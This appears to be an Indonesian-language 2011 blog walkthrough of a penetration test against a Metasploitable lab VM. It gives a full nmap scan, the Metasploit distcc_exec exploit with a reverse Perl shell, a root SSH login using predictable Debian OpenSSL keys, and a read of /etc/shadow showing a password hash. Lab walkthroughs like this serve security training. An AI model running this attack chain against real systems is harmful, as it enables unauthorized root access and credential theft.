Searching...
November 14, 2011
Anonymous
Monday, November 14, 2011
0 comment

[VULNERABILITY] DistCC Daemon

Home » BackTrack » Hacking » [VULNERABILITY] DistCC Daemon
Beberapa hari yang lalu, saya melakukan penetration testing terhadap software DistCC melalui Metasploit dan sedikit bantuan dari ExploitDB.

Yang diperlukan:
  1. Metasploit Framework (metasploit.com/download)
  2. ExploitDB (www.exploitdb.com)
  3. RSA guessable (baca modul untuk mendapatkan link download)
Tutorial:

  1. Login DistCC sebagai Daemon
  2. Cari tau RSA key public yang digunakan server
  3. Login sebagai root melalui RSA guessable
Modul:

root@blue-dragon:~# nmap -sS -sV -p1-65535 -f -n -vv 192.168.1.8



Starting Nmap 5.61TEST2 ( http://nmap.org ) at 2011-11-14 10:01 WIT
NSE: Loaded 11 scripts for scanning.
Initiating ARP Ping Scan at 10:01
Scanning 192.168.1.8 [1 port]
Completed ARP Ping Scan at 10:01, 0.04s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 10:01
Scanning 192.168.1.8 [65535 ports]
Discovered open port 22/tcp on 192.168.1.8
Discovered open port 80/tcp on 192.168.1.8
Discovered open port 53/tcp on 192.168.1.8
Discovered open port 25/tcp on 192.168.1.8
Discovered open port 21/tcp on 192.168.1.8
Discovered open port 3306/tcp on 192.168.1.8
Discovered open port 23/tcp on 192.168.1.8
Discovered open port 3632/tcp on 192.168.1.8
Discovered open port 8180/tcp on 192.168.1.8
Discovered open port 5432/tcp on 192.168.1.8
Completed SYN Stealth Scan at 10:01, 9.96s elapsed (65535 total ports)
Initiating Service scan at 10:01
Scanning 10 services on 192.168.1.8
Completed Service scan at 10:01, 21.02s elapsed (10 services on 1 host)
NSE: Script scanning 192.168.1.8.
NSE: Starting runlevel 1 (of 1) scan.
Nmap scan report for 192.168.1.8
Host is up (0.00040s latency).
Scanned at 2011-11-14 10:01:00 WIT for 31s
Not shown: 65524 closed ports
PORT     STATE    SERVICE    VERSION
21/tcp   open     ftp        ProFTPD 1.3.1
22/tcp   open     ssh        OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open     telnet     Linux telnetd
25/tcp   open     smtp       Postfix smtpd
53/tcp   open     domain     ISC BIND 9.4.2
80/tcp   open     http       Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
3306/tcp open     mysql      MySQL 5.0.51a-3ubuntu5
3632/tcp open     distccd    distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open     postgresql PostgreSQL DB 8.3.0 - 8.3.7
8009/tcp filtered ajp13
8180/tcp open     http       Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:3C:99:68 (VMware)
Service Info: Host:  metasploitable.localdomain; OSs: Unix, Linux; CPE: cpe:/o:linux:kernel


Read data files from: /usr/local/bin/../share/nmap
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.36 seconds
           Raw packets sent: 66676 (2.934MB) | Rcvd: 65537 (2.622MB)


ScreenShot

Hasil scan membuktikan server memiliki DistCC pada port 3632. Mari kita masuk ssh sebagai daemon dengan bantuan Metasploit (=

root@blue-dragon:~# msfconsole
msf > search distcc
msf > use exploit/unix/misc/distcc_exec
msf  exploit(distcc_exec) > set RHOST 192.168.1.8
msf  exploit(distcc_exec) > set PAYLOAD cmd/unix/reverse_perl
msf  exploit(distcc_exec) > set LHOST 192.168.1.2
msf  exploit(distcc_exec) > show options 


Module options (exploit/unix/misc/distcc_exec):


   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.8      yes       The target address
   RPORT  3632             yes       The target port




Payload options (cmd/unix/reverse_perl):


   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.2      yes       The listen address
   LPORT  4444             yes       The listen port




Exploit target:


   Id  Name
   --  ----
   0   Automatic Target

ScreenShot


Exploit:

msf  exploit(distcc_exec) > exploit 


[*] Started reverse handler on 192.168.1.2:4444 
[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.8:33625) at 2011-11-14 10:11:41 +0700


uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
whoami
daemon
ls -lart
total 16
drwxr-xr-x 21 root root 4096 Apr 28  2010 ..
drwxrwxrwt  2 root root 4096 Nov 13 11:04 .X11-unix
drwxrwxrwt  2 root root 4096 Nov 13 11:04 .ICE-unix
drwxrwxrwt  4 root root 4096 Nov 13 11:55 

ls -lart /root
total 32
-rw-r--r--  1 root root  141 Oct 20  2007 .profile
-rw-r--r--  1 root root 2227 Oct 20  2007 .bashrc
-rwx------  1 root root  401 Apr 28  2010 reset_logs.sh
-rw-------  1 root root  187 Apr 28  2010 .lesshst
drwxr-xr-x 21 root root 4096 Apr 28  2010 ..
drwxr-xr-x  3 root root 4096 May 17  2010 .
drwxr-xr-x  2 root root 4096 May 17  2010 .ssh
-rw-------  1 root root  123 Nov 13 11:32 .bash_history
ls -lart /root/.ssh
total 12
drwxr-xr-x 3 root root 4096 May 17  2010 ..
drwxr-xr-x 2 root root 4096 May 17  2010 .
-rw-r--r-- 1 root root  405 May 17  2010 authorized_keys
cat /root/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable

Kita mendapatkan kode ini:
AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w

Exploit


Lalu search RSA di ExploitDB:


root@blue-dragon:~# cd /pentest/exploits/exploitdb/
root@blue-dragon:/pentest/exploits/exploitdb# ./searchsploit openssl
 Description                                                                 Path
--------------------------------------------------------------------------- -------------------------
Brute forcer for OpenSSL ASN.1 parsing bugs (<=0.9.6j <=0.9.7b)             /multiple/dos/146.c
Apache OpenSSL Remote Exploit (Multiple Targets) (OpenFuckV2.c)             /linux/remote/764.c
OpenSSL < 0.9.7l / 0.9.8d SSLv2 Client Crash Exploit                        /multiple/dos/4773.pl
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit                      /multiple/remote/5622.txt
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (ruby)               /multiple/remote/5632.rb
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (Python)             /linux/remote/5720.py
OpenSSL <= 0.9.8k                                                           /multiple/dos/8720.c
OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS Exploit                   /multiple/dos/8873.c
OpenSSL remote DoS                                                          /linux/dos/12334.c
root@blue-dragon:/pentest/exploits/exploitdb# cat platforms/multiple/remote/5622.txt
the debian openssl issue leads that there are only 65.536 possible ssh 
keys generated, cause the only entropy is the pid of the process 
generating the key.


This leads to that the following perl script can be used with the 
precalculated ssh keys to brute force the ssh login. It works if such a 
keys is installed on a non-patched debian or any other system manual 
configured to.


On an unpatched system, which doesn't need to be debian, do the following:


keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl/

1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
http://exploit-db.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2


[snip...]

Download RSA di:
http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
atau
http://exploit-db.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2

Extract dan cari RSA-nya.

root@blue-dragon:~/tools/rsa/2048# grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub
57c3115d77c56390332dc5c49978627a-5429.pub

ScreenShot

Lalu login SSH dengan file .pub tadi.

root@blue-dragon:~/tools/rsa/2048# ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@192.168.1.8
Last login: Sun Nov 13 11:31:21 2011 from 192.168.1.2
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have mail.
root@metasploitable:~# uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
root@metasploitable:~# cat /etc/issue
Ubuntu 8.04 \n \l

root@metasploitable:~# cat /etc/shadow
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
[snip...]

ScreenShot

Written By
Blue Dragon

Supported By
Red Dragon



Originaly Created By Anonymous on Monday, November 14, 2011
Labels: ,
Share This To :

0 comment:

Post a Comment

Subscribe to: Post Comments (Atom)
 
Back to top!